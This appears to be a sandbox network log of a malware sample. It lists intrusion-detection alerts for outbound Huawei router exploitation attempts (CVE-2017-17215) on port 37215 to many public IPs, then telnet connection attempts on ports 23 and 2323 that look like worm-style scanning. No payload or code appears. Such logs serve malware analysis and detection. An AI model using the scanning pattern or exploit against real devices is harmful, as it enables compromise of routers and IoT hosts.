                                                2025-02-12T16:58:05.895083+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360622197.242.225.23237215TCP
                                                2025-02-12T16:58:05.895298+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359666200.74.35.15737215TCP
                                                2025-02-12T16:58:05.895468+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348970174.129.192.13237215TCP
                                                2025-02-12T16:58:05.895576+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233311241.117.213.4737215TCP
                                                2025-02-12T16:58:05.896254+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234488083.168.216.13137215TCP
                                                2025-02-12T16:58:05.910063+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235622631.21.240.11237215TCP
                                                2025-02-12T16:58:06.890848+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344400200.151.176.13537215TCP
                                                2025-02-12T16:58:06.890935+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356326157.161.41.18137215TCP
                                                2025-02-12T16:58:06.891102+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348780197.83.58.8437215TCP
                                                2025-02-12T16:58:06.891261+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233487239.55.146.15037215TCP
                                                2025-02-12T16:58:06.891342+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336762157.74.132.19637215TCP
                                                2025-02-12T16:58:06.891467+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348232197.143.240.15937215TCP
                                                2025-02-12T16:58:06.891499+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348694157.88.130.18637215TCP
                                                2025-02-12T16:58:06.891547+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348078157.22.75.25237215TCP
                                                2025-02-12T16:58:06.891658+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356510197.234.246.537215TCP
                                                2025-02-12T16:58:06.891821+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340786157.180.86.13937215TCP
                                                2025-02-12T16:58:06.891821+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234318653.196.50.1737215TCP
                                                2025-02-12T16:58:06.891986+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234596617.24.93.4637215TCP
                                                2025-02-12T16:58:06.892367+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340530197.56.80.5237215TCP
                                                2025-02-12T16:58:06.892380+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235396441.160.40.537215TCP
                                                2025-02-12T16:58:06.892433+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234664041.58.174.15437215TCP
                                                2025-02-12T16:58:06.892930+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349096157.123.6.15537215TCP
                                                2025-02-12T16:58:06.893228+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354624157.254.83.7037215TCP
                                                2025-02-12T16:58:06.906308+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347800157.235.81.13337215TCP
                                                2025-02-12T16:58:06.906368+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234442241.1.142.18137215TCP
                                                2025-02-12T16:58:06.906426+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233893241.54.47.22137215TCP
                                                2025-02-12T16:58:06.906543+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233933241.96.54.23037215TCP
                                                2025-02-12T16:58:06.906626+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348130123.150.62.9937215TCP
                                                2025-02-12T16:58:06.906747+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354772197.168.247.20137215TCP
                                                2025-02-12T16:58:06.906772+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352616156.31.21.17737215TCP
                                                2025-02-12T16:58:06.906948+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234607641.101.72.18137215TCP
                                                2025-02-12T16:58:06.907009+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349230199.89.4.037215TCP
                                                2025-02-12T16:58:06.907429+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355318157.122.88.15537215TCP
                                                2025-02-12T16:58:06.907973+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360922157.180.99.16837215TCP
                                                2025-02-12T16:58:06.908335+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234083241.240.136.12337215TCP
                                                2025-02-12T16:58:06.908352+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353126157.34.31.5637215TCP
                                                2025-02-12T16:58:06.908395+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234563441.179.67.2237215TCP
                                                2025-02-12T16:58:06.908648+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349662157.0.184.10837215TCP
                                                2025-02-12T16:58:06.908721+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233564041.75.122.4437215TCP
                                                2025-02-12T16:58:06.908855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339880157.159.161.14337215TCP
                                                2025-02-12T16:58:06.909985+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233667227.22.242.22137215TCP
                                                2025-02-12T16:58:06.922439+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348402157.225.55.6037215TCP
                                                2025-02-12T16:58:06.922509+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234213841.120.100.25337215TCP
                                                2025-02-12T16:58:06.922519+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351012222.146.92.10937215TCP
                                                2025-02-12T16:58:06.922586+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348092197.30.2.14037215TCP
                                                2025-02-12T16:58:06.922595+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354866210.16.172.5137215TCP
                                                2025-02-12T16:58:06.922595+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347028197.245.56.18337215TCP
                                                2025-02-12T16:58:06.922922+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235647241.37.179.1937215TCP
                                                2025-02-12T16:58:06.922991+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334640157.50.36.24537215TCP
                                                2025-02-12T16:58:06.923130+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344674197.252.163.10337215TCP
                                                2025-02-12T16:58:06.923153+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347134179.50.84.19537215TCP
                                                2025-02-12T16:58:06.923153+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.23426104.94.130.7737215TCP
                                                2025-02-12T16:58:06.923242+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334232157.35.123.18037215TCP
                                                2025-02-12T16:58:06.923242+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347232204.73.122.24237215TCP
                                                2025-02-12T16:58:06.923326+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.23549388.38.139.12337215TCP
                                                2025-02-12T16:58:06.923630+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338266140.255.237.22537215TCP
                                                2025-02-12T16:58:06.923657+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336314190.255.181.2537215TCP
                                                2025-02-12T16:58:06.923715+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339128157.23.172.437215TCP
                                                2025-02-12T16:58:06.923789+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234677441.160.145.20937215TCP
                                                2025-02-12T16:58:06.923903+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358050197.24.78.5337215TCP
                                                2025-02-12T16:58:06.924016+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348540157.248.32.18937215TCP
                                                2025-02-12T16:58:06.924120+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352446197.25.14.20737215TCP
                                                2025-02-12T16:58:06.924408+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349462197.33.140.23937215TCP
                                                2025-02-12T16:58:06.924472+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354836157.192.25.11937215TCP
                                                2025-02-12T16:58:06.924799+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235903041.249.240.10637215TCP
                                                2025-02-12T16:58:06.925185+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234044843.96.152.1737215TCP
                                                2025-02-12T16:58:06.925601+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350676157.230.248.2737215TCP
                                                2025-02-12T16:58:06.925669+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341422157.169.183.16637215TCP
                                                2025-02-12T16:58:06.925774+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344882197.157.130.24137215TCP
                                                2025-02-12T16:58:06.926117+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360922157.226.195.10737215TCP
                                                2025-02-12T16:58:06.926200+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337136103.184.52.8437215TCP
                                                2025-02-12T16:58:06.926585+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352182189.107.65.8237215TCP
                                                2025-02-12T16:58:06.926765+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233772641.125.213.23937215TCP
                                                2025-02-12T16:58:06.926828+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359778157.245.179.22237215TCP
                                                2025-02-12T16:58:06.926872+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333372153.199.189.7937215TCP
                                                2025-02-12T16:58:06.926964+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351832157.21.141.20137215TCP
                                                2025-02-12T16:58:06.927042+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352794197.137.51.837215TCP
                                                2025-02-12T16:58:06.927265+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234413641.138.53.23137215TCP
                                                2025-02-12T16:58:06.927266+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347716157.31.57.13237215TCP
                                                2025-02-12T16:58:06.927271+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337192197.246.164.6837215TCP
                                                2025-02-12T16:58:06.927404+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234654441.36.142.3537215TCP
                                                2025-02-12T16:58:06.927428+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233480641.32.83.7337215TCP
                                                2025-02-12T16:58:06.927442+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340402197.3.82.16037215TCP
                                                2025-02-12T16:58:06.927511+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341644197.106.86.23637215TCP
                                                2025-02-12T16:58:06.927731+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345258197.74.142.7937215TCP
                                                2025-02-12T16:58:06.927775+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338782130.242.60.23837215TCP
                                                2025-02-12T16:58:06.927776+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343962197.125.244.16637215TCP
                                                2025-02-12T16:58:06.927894+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337682157.250.205.24037215TCP
                                                2025-02-12T16:58:06.928009+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233331841.105.6.13137215TCP
                                                2025-02-12T16:58:06.928061+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339038197.13.2.20437215TCP
                                                2025-02-12T16:58:06.928421+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348708197.189.116.4737215TCP
                                                2025-02-12T16:58:06.928922+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359132137.75.115.4837215TCP
                                                2025-02-12T16:58:06.929294+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360634157.197.81.18337215TCP
                                                2025-02-12T16:58:06.937550+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349778157.244.142.11737215TCP
                                                2025-02-12T16:58:06.941254+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235058641.27.225.8537215TCP
                                                2025-02-12T16:58:06.941257+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343602157.166.137.9337215TCP
                                                2025-02-12T16:58:06.941420+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355722197.133.126.19237215TCP
                                                2025-02-12T16:58:06.941433+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234328641.135.28.5737215TCP
                                                2025-02-12T16:58:06.941538+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349882157.135.83.4437215TCP
                                                2025-02-12T16:58:06.943071+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235711241.192.216.2137215TCP
                                                2025-02-12T16:58:06.943116+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235930641.242.167.23637215TCP
                                                2025-02-12T16:58:07.921907+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341588162.169.7.3137215TCP
                                                2025-02-12T16:58:07.922055+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358998119.170.127.6837215TCP
                                                2025-02-12T16:58:07.922130+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339484142.0.98.11537215TCP
                                                2025-02-12T16:58:07.922326+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346904197.243.92.8237215TCP
                                                2025-02-12T16:58:07.922409+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234801672.59.139.16437215TCP
                                                2025-02-12T16:58:07.922584+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351228157.30.28.17837215TCP
                                                2025-02-12T16:58:07.922674+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357450197.226.98.11837215TCP
                                                2025-02-12T16:58:07.922808+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355424157.119.216.22537215TCP
                                                2025-02-12T16:58:07.922919+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358556197.239.249.11137215TCP
                                                2025-02-12T16:58:07.924180+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356680197.117.170.18837215TCP
                                                2025-02-12T16:58:07.924290+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341782157.127.185.21537215TCP
                                                2025-02-12T16:58:07.925786+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352746157.253.7.13237215TCP
                                                2025-02-12T16:58:07.937597+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351044197.3.46.21037215TCP
                                                2025-02-12T16:58:07.937633+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234775441.74.20.14337215TCP
                                                2025-02-12T16:58:07.937683+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343626150.64.213.8137215TCP
                                                2025-02-12T16:58:07.937775+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333180157.35.203.19637215TCP
                                                2025-02-12T16:58:07.937873+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340446197.92.100.5937215TCP
                                                2025-02-12T16:58:07.938021+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334058157.29.72.11537215TCP
                                                2025-02-12T16:58:07.939797+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343702157.26.217.11137215TCP
                                                2025-02-12T16:58:07.939851+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337120197.139.69.19337215TCP
                                                2025-02-12T16:58:07.941508+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234487641.110.222.9537215TCP
                                                2025-02-12T16:58:07.941623+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234231241.34.254.25437215TCP
                                                2025-02-12T16:58:07.943536+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341964157.216.135.20437215TCP
                                                2025-02-12T16:58:07.955014+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235582641.15.66.21237215TCP
                                                2025-02-12T16:58:07.955230+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356612131.217.21.9037215TCP
                                                2025-02-12T16:58:07.955238+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360710157.191.198.23337215TCP
                                                2025-02-12T16:58:07.957197+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339602157.250.101.21737215TCP
                                                2025-02-12T16:58:07.959098+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335012197.152.147.23737215TCP
                                                2025-02-12T16:58:09.922706+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235497441.162.201.4837215TCP
                                                2025-02-12T16:58:09.938301+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356168157.20.179.20237215TCP
                                                2025-02-12T16:58:09.939253+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.236094241.121.226.537215TCP
                                                2025-02-12T16:58:09.939414+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235542067.184.144.10737215TCP
                                                2025-02-12T16:58:09.940700+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334304157.81.215.14737215TCP
                                                2025-02-12T16:58:09.940911+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234562841.104.77.18337215TCP
                                                2025-02-12T16:58:09.941368+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233857251.110.163.17037215TCP
                                                2025-02-12T16:58:09.941492+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339000197.18.84.16437215TCP
                                                2025-02-12T16:58:09.984508+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337914157.229.11.6637215TCP
                                                TimestampSource PortDest PortSource IPDest IP
                                                Feb 12, 2025 16:56:57.730925083 CET240702323192.168.2.23183.204.106.95
                                                Feb 12, 2025 16:56:57.730925083 CET2407023192.168.2.23201.49.66.7
                                                Feb 12, 2025 16:56:57.730931997 CET2407023192.168.2.23112.100.211.87
                                                Feb 12, 2025 16:56:57.730942011 CET2407023192.168.2.2353.219.159.191
                                                Feb 12, 2025 16:56:57.730948925 CET2407023192.168.2.23188.250.172.71
                                                Feb 12, 2025 16:56:57.730951071 CET2407023192.168.2.23165.127.40.182
                                                Feb 12, 2025 16:56:57.730963945 CET240702323192.168.2.2331.205.123.116
                                                Feb 12, 2025 16:56:57.730966091 CET2407023192.168.2.2369.82.173.226
                                                Feb 12, 2025 16:56:57.730969906 CET2407023192.168.2.23149.220.173.4
                                                Feb 12, 2025 16:56:57.730969906 CET2407023192.168.2.2323.13.124.124
                                                Feb 12, 2025 16:56:57.730969906 CET2407023192.168.2.2360.83.103.42
                                                Feb 12, 2025 16:56:57.730969906 CET2407023192.168.2.2396.161.122.251
                                                Feb 12, 2025 16:56:57.730973005 CET2407023192.168.2.23203.132.56.82
                                                Feb 12, 2025 16:56:57.730990887 CET2407023192.168.2.2342.177.204.67
                                                Feb 12, 2025 16:56:57.730998993 CET2407023192.168.2.2339.199.182.233
                                                Feb 12, 2025 16:56:57.730998993 CET2407023192.168.2.23217.39.19.227
                                                Feb 12, 2025 16:56:57.731000900 CET2407023192.168.2.2344.55.32.207
                                                Feb 12, 2025 16:56:57.731005907 CET2407023192.168.2.2389.27.202.147
                                                Feb 12, 2025 16:56:57.731005907 CET2407023192.168.2.23182.158.194.199
                                                Feb 12, 2025 16:56:57.731005907 CET2407023192.168.2.23122.130.121.252
                                                Feb 12, 2025 16:56:57.731014967 CET240702323192.168.2.2363.219.239.161
                                                Feb 12, 2025 16:56:57.731021881 CET2407023192.168.2.2313.79.235.101
                                                Feb 12, 2025 16:56:57.731033087 CET2407023192.168.2.2361.101.193.72
                                                Feb 12, 2025 16:56:57.731036901 CET2407023192.168.2.23203.99.76.96
                                                Feb 12, 2025 16:56:57.731036901 CET2407023192.168.2.2381.152.188.185
                                                Feb 12, 2025 16:56:57.731050968 CET2407023192.168.2.2396.249.194.161
                                                Feb 12, 2025 16:56:57.731055021 CET2407023192.168.2.23122.81.238.41
                                                Feb 12, 2025 16:56:57.731061935 CET2407023192.168.2.23112.143.124.103
                                                Feb 12, 2025 16:56:57.731061935 CET2407023192.168.2.23154.187.153.46
                                                Feb 12, 2025 16:56:57.731064081 CET2407023192.168.2.23163.9.31.33
                                                Feb 12, 2025 16:56:57.731077909 CET240702323192.168.2.23115.224.16.130
                                                Feb 12, 2025 16:56:57.731080055 CET2407023192.168.2.23100.51.118.112
                                                Feb 12, 2025 16:56:57.731080055 CET2407023192.168.2.2362.221.195.170
                                                Feb 12, 2025 16:56:57.731090069 CET2407023192.168.2.23130.227.26.12
                                                Feb 12, 2025 16:56:57.731095076 CET2407023192.168.2.23174.151.102.200
                                                Feb 12, 2025 16:56:57.731100082 CET2407023192.168.2.2370.144.123.171
                                                Feb 12, 2025 16:56:57.731102943 CET2407023192.168.2.2375.212.176.121
                                                Feb 12, 2025 16:56:57.731102943 CET2407023192.168.2.23148.118.231.188
                                                Feb 12, 2025 16:56:57.731113911 CET2407023192.168.2.2363.138.15.160
                                                Feb 12, 2025 16:56:57.731115103 CET2407023192.168.2.2358.117.152.149
                                                Feb 12, 2025 16:56:57.731120110 CET240702323192.168.2.23221.69.127.6
                                                Feb 12, 2025 16:56:57.731127024 CET2407023192.168.2.23188.120.176.37
                                                Feb 12, 2025 16:56:57.731127024 CET2407023192.168.2.2376.192.122.252
                                                Feb 12, 2025 16:56:57.731129885 CET2407023192.168.2.2358.203.234.227
                                                Feb 12, 2025 16:56:57.731131077 CET2407023192.168.2.23116.157.43.96
                                                Feb 12, 2025 16:56:57.731141090 CET2407023192.168.2.23159.244.221.197
                                                Feb 12, 2025 16:56:57.731149912 CET2407023192.168.2.23109.55.228.43
                                                Feb 12, 2025 16:56:57.731161118 CET2407023192.168.2.2387.187.1.120
                                                Feb 12, 2025 16:56:57.731161118 CET2407023192.168.2.23167.50.74.92
                                                Feb 12, 2025 16:56:57.731162071 CET240702323192.168.2.23121.112.70.139
                                                Feb 12, 2025 16:56:57.731170893 CET2407023192.168.2.23221.208.230.171
                                                Feb 12, 2025 16:56:57.731174946 CET2407023192.168.2.2337.122.117.136
                                                Feb 12, 2025 16:56:57.731175900 CET2407023192.168.2.2343.226.81.179
                                                Feb 12, 2025 16:56:57.731175900 CET2407023192.168.2.23199.93.115.220
                                                Feb 12, 2025 16:56:57.731178045 CET2407023192.168.2.23169.183.77.108
                                                Feb 12, 2025 16:56:57.731184959 CET2407023192.168.2.2391.123.233.38
                                                Feb 12, 2025 16:56:57.731189966 CET2407023192.168.2.23163.214.146.191
                                                Feb 12, 2025 16:56:57.731197119 CET2407023192.168.2.2358.197.183.54
                                                Feb 12, 2025 16:56:57.731208086 CET2407023192.168.2.23173.107.155.243
                                                Feb 12, 2025 16:56:57.731208086 CET2407023192.168.2.23133.123.240.113
                                                Feb 12, 2025 16:56:57.731215954 CET240702323192.168.2.23165.176.179.13
                                                Feb 12, 2025 16:56:57.731220007 CET2407023192.168.2.23121.193.3.235
                                                Feb 12, 2025 16:56:57.731228113 CET2407023192.168.2.2386.215.187.181
                                                Feb 12, 2025 16:56:57.731232882 CET2407023192.168.2.2382.60.190.122
                                                Feb 12, 2025 16:56:57.731237888 CET2407023192.168.2.2363.244.169.135
                                                Feb 12, 2025 16:56:57.731239080 CET2407023192.168.2.23203.239.119.167
                                                Feb 12, 2025 16:56:57.731251955 CET2407023192.168.2.2378.240.222.208
                                                Feb 12, 2025 16:56:57.731251955 CET2407023192.168.2.2390.222.22.23
                                                Feb 12, 2025 16:56:57.731264114 CET2407023192.168.2.2342.204.38.170
                                                Feb 12, 2025 16:56:57.731270075 CET2407023192.168.2.2354.136.225.228
                                                Feb 12, 2025 16:56:57.731281042 CET2407023192.168.2.23124.130.207.143
                                                Feb 12, 2025 16:56:57.731288910 CET2407023192.168.2.2381.188.12.158
                                                Feb 12, 2025 16:56:57.731291056 CET2407023192.168.2.2373.3.193.72
